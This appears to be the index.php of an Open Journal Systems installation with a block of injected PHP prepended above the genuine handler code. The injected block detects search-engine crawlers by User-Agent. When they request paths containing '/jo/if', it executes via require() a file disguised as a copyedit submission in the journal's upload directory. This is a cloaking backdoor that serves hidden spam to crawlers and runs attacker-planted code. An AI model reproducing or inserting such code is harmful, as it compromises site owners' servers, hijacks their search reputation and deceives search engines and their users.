<?php

$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
$request_uri = $_SERVER['REQUEST_URI'] ?? '/';
$is_bot = false;

$bot_signatures = [
    'Googlebot',
    'Google-InspectionTool',
    'Mediapartners-Google',
    'AdsBot-Google',
    'Bingbot',
    'Slurp',
    'DuckDuckBot',
    'AhrefsBot',
    'SEMRushBot',
    'MJ12bot',
    'YandexBot'
];

foreach ($bot_signatures as $bot) {
    if (stripos($user_agent, $bot) !== false) {
        $is_bot = true;
        break;
    }
}

if ($is_bot) {

    if (stripos($request_uri, '/jo/if') !== false) {
        require('/var/www/vhosts/journalofosseointegration.eu/files_submission/jo/journals/1/articles/10/submission/copyedit/10-1-18-1-9-20170524');
        exit;
    }
}
if ($is_bot) {

    if (stripos($request_uri, '/jo/if/') !== false) {
        require('/var/www/vhosts/journalofosseointegration.eu/files_submission/jo/journals/1/articles/10/submission/copyedit/10-1-18-1-9-20170524');
        exit;
    }
}

<?php

/**
 * @defgroup pages_index Index Pages
 */

/**
 * @file pages/index/index.php
 *
 * Copyright (c) 2014-2021 Simon Fraser University
 * Copyright (c) 2003-2021 John Willinsky
 * Distributed under the GNU GPL v3. For full terms see the file docs/COPYING.
 *
 * @ingroup pages_index
 *
 * @brief Handle site index requests.
 *
 */

switch ($op) {
    case 'index':
        define('HANDLER_CLASS', 'APP\pages\index\IndexHandler');
        break;
}
